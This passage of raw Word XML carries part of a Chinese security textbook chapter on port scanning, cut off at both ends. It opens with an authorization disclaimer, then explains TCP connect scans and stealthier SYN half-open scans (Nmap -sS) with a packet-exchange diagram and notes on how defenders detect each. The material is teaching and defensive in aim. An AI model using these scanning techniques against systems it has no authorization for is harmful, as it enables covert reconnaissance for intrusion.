              <w:t xml:space="preserve">：UDP</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">扫描的“静默”特性依赖</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> ICMP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">目的不可达（Type</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 3, Code </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3）的生成规则，涉及</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">层的分片与错误报告机制。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Ch28（防火墙</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> / ACL / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">NAT）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：扫描结果受中间设备干扰，本节将在“理想网络假设”的基础上，标记防火墙与丢包对判定的扰动，具体防御原理可对应回</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Ch28。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">授权与隔离声明框</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口扫描是主动侦察行为，向未授权的目标系统发起扫描即构成计算机滥用，国内外法律均明确禁止。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">本节涉及的一切命令、技术与报文分析仅限于读者自建的隔离实验室、官方授权的练习靶机（如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Metasploitable、HackTheBox、TryHackMe、VulnHub </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">等），或在取得书面授权的前提下针对自有资产进行评估。实验网络必须与生产环境及公网物理或逻辑隔离。扫描他人系统前务必获得明确授权，否则属于违法行为。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描的最简单直觉是“敲门”：向目标主机的各个端口逐一发送探测包，根据回应判断端口是否开放。不同“敲门”方式——是否完成完整的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手、是否发送连接建立请求、是否依赖无连接协议——直接影响攻击者留下的痕迹大小、扫描速度以及结果的确定性。从协议假设的角度看，扫描之所以可行，是因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈在设计时优先保障开放性互联，并未强制要求对探测行为进行身份认证或保密。这一假设的边界在于：当中间防火墙、入侵检测系统或主机自身配置了严格的过滤与监控策略，原始协议行为会被覆盖，攻击者必须应对结果模糊与误判的风险，这恰恰是防御的发力点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">连接扫描（TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scan）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是最“规矩”的敲门方式。它调用操作系统标准的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统调用，试图对目标端口完成完整的三次握手。若端口开放，目标返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN-ACK，攻击方主机随后回复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACK，连接进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ESTABLISHED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态；此时扫描器立即通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">close</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终止连接，不进行数据交互。若端口关闭，目标返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST，攻击方操作系统内核将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调用标记为连接拒绝。这一过程完全复用操作系统的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议栈，无需构造原始报文，故不需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root/管理员权限，编程实现极为简单——这正是其“可靠性”的来源。然而，完整的握手意味着连接记录会被写入目标系统的应用日志或内核连接跟踪表（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出中出现短暂</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN_RECV </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ESTABLISHED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">条目，或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中留下服务进程日志），极易被安全监控系统发现。因此，connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描通常被归类为“非隐蔽”扫描，常用于授权渗透测试的初期阶段，或作为与其他扫描类型进行对比的基准。①【标准/通用原理，跨环境成立：TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描依据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POSIX socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">行为与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 793 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规定的三次握手，判定逻辑标准化】②【环境/版本相关，因靶机/工具版本而异：具体日志位置与详细度取决于目标操作系统与安全审计配置】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从防御者视角出发，connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描是最容易检测的扫描形式。大量短时间内来自同一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试，尤其在多个不同端口上快速完成握手并立即断开，是典型特征。IDS/IPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预置规则）会将这类模式标记为“端口扫描”或“网络侦察活动”。这也是为何现代渗透测试更青睐</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描（SYN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Scan / Half-Open </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Scan）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的核心思路是利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机中“在收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后不最终完成握手”的行为，避免留下完整的连接记录。Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">默认使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">即为此模式，它要求攻击方具备原始套接字（raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">socket）能力，通常需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root/管理员权限，因为必须手工构造和解析</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文。其工作流程如图</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sequenceDiagram</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant A as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Nmap)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> participant T as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标主机</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;T: SYN (SrcPort=ephemeral, DstPort=22)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> alt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口开放</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> T--&gt;&gt;A: SYN-ACK</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> A-&gt;&gt;T: RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">(立即终止半连接)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">判定:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开放</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> else </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口关闭</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> T--&gt;&gt;A: RST (ACK=0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note over A: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">判定:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关闭</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">图</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1：SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的报文交互（简化理想网络假设</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击方发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包到目标端口，若收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN-ACK，证明端口正处于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LISTEN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态，攻击方随即发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包终止握手，避免连接进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ESTABLISHED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态。由于三次握手未完成，许多应用层服务不会记录本次连接尝试，操作系统的连接跟踪表也可能不产生条目，从而降低日志留存概率。若收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST，则端口关闭。这一机制直接决定了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描更隐蔽（stealthy），也因此常被称为“半开扫描”或“隐形扫描”。①【标准/通用原理，跨环境成立：SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描根据</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 793 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中“收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后若不可接受则发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST”的行为设计，TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机不要求必须完成三次握手】②【环境/版本相关：某些现代防火墙或操作系统会将未完成握手的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">尝试也记录到日志（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的内核级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
